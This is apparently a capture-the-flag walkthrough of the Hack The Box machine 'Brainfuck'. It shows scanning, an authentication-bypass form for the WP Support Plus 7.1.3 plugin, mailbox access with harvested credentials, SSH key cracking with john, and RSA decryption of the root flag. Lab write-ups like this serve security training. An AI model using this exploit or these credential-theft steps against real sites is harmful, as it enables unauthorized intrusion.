Brainfuck

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.17 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Sun Sep 11 19:33:46 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.050s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
110/tcp open  pop3
143/tcp open  imap
443/tcp open  https

# Nmap done at Sun Sep 11 19:34:13 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,25,110,143,443 10.10.10.17 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Sun Sep 11 19:35:23 2022 as: nmap -sCV -p22,25,110,143,443 -oN targeted 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.036s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL CAPA AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) TOP
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: IMAP4rev1 SASL-IR capabilities more LOGIN-REFERRALS LITERAL+ ENABLE ID have Pre-login listed post-login IDLE AUTH=PLAINA0001 OK
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 11 19:36:15 2022 -- 1 IP address (1 host up) scanned in 52.24 seconds

There is an HTTPS website on port 443, and nmap reported that there are two subdomains called www.brainfuck.htb and sup3rs3cr3t.brainfuck.htb. Let's add both to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.17 brainfuck.htb   www.brainfuck.htb   sup3rs3cr3t.brainfuck.htb

We can see with whatweb, that the website is a WordPress CMS.

whatweb https://brainfuck.htb

https://brainfuck.htb [200 OK] Bootstrap[4.7.3], Country[RESERVED][ZZ], Email[ajax-loader@2x.gif,orestis@brainfuck.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.0 (Ubuntu)], IP[10.10.10.17], JQuery[1.12.4], MetaGenerator[WordPress 4.7.3], Modernizr, PoweredBy[WordPress,], Script[text/javascript], Title[Brainfuck Ltd. – Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3], nginx[1.10.0]

If we take a look at the website, we'll see a post made by the admin user, saying that the SMTP service is available, and the message include the orestis@brainfuck.htb email address.

The other domain name shows a forum page.

Let's run wpscan to enumerate the WordPress site.

wpscan --url https://brainfuck.htb -e vp --disable-tls-checks -o wpScan

• --url URL of the WordPress site.

• -e ap enumerate all plugins.

• --disable-tls-checks disables SSL/TLS certificate verification.

• -o save result to a file.

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Mon Sep 12 00:20:20 2022

Interesting Finding(s):
...
[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 ...

Exploitation

There is one plugin installed called wp-support-plus-responsive-ticket-system, in the 7.1.3 version. Let's search for any common vulnerabilities.

searchsploit wordpress plus responsive ticket 7.1.3

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation                                                | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection                                                       | php/webapps/40939.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is a way to escalate privileges. First, we'll have to make the index.html file with the following code.

nano index.html

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

Now, set an HTTP server on the current directory with PHP on port 1234.

php -S localhost:1234

• -S run with built-in web server.

Now access the web server with the browser, and press the Login button.

If we access the /wp-admin directory, we'll be able to see the WordPress dashboard.

I tried ways to get remote command execution, like modifying the 404.php file, or uploading a custom plugin, but none of those worked. But if we go to the Plugins section, we'll see one called Easy WP SMTP.

In the Settings option, we'll see that the emails are sent by orestis@brainfuck.htb.

But we can also see the username orestis and the kHGuERB29DNiNE password.

Now that we have credentials for the SMTP server, let's see if there are any emails in the orestis user inbox.

nc 10.10.10.17 110

+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
.

There are two emails. The first one just says that the WordPress site is available.

retr 1

+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
        id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/
.

But the second one have another credentials.

retr 2

+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
        id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
.

These credentials are valid for login page of the forum website.

Now we can see three discussions.

The Key discussion looks to be encrypted.

It could be encrypted with the Vigenère cipher. There is one specific message where it looks like there is a URL.

Let's use dcode.fr to decode the message. Paste the message, and press on AUTOMATIC DECRYPTION.

In the results, we'll see a link to a private SSH key.

Download the id_rsa file from the link. If we take a look at the key, we'll see that it is encrypted. Let's try to break it with john. First, create a hash for the id_rsa file, and put it in the id_rsa.hash file.

ssh2john id_rsa > id_rsa.hash

Then, break it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)     
1g 0:00:00:13 DONE (2022-09-12 01:35) 0.07490g/s 933364p/s 933364c/s 933364C/s 3poulakia!..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Finally, give the id_rsa file the right permissions, and get a shell as the orestis user. Then we'll be able to grab the user flag.

chmod 600 id_rsa

ssh -i id_rsa orestis@10.10.10.17

Enter passphrase for key 'id_rsa': 3poulakia!
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Wed May  3 19:46:00 2017 from 10.10.11.4
orestis@brainfuck:~$ whoami
orestis
orestis@brainfuck:~$ cat user.txt 
2c11cfbc5b959f73ac15a3310bd097c9

Privilege Escalation

If we look in the current directory, we'll see a file called encrypt.sage with the following code.

cat encrypt.sage

nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)



c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

There is also the debug.txt file with the values of the p, q and e variables.

cat debug.txt

7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

And the output.txt file which contains the /root/root.txt file encrypted.

cat output.txt

Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

We have all the values needed to calculate the root flag. Go to cryptool.org, and put the values of p and q.

Then, paste the value of e.

And the encrypted flag in the Ciphertext field. Make sure the arrow is pointing up.

Now, we'll have to convert the plaintext string to hexadecimal.

python3 -c "print(hex(24604052029401386049980296953784287079059245867880966944246662849341507003750))"

0x3665666331613564626238393034373531636536353636613330356262386566

Finally, if we decode the string, all we have to do is reap the harvest and take the root flag.

echo "0x3665666331613564626238393034373531636536353636613330356262386566" | xxd -r -p

6efc1a5dbb8904751ce6566a305bb8ef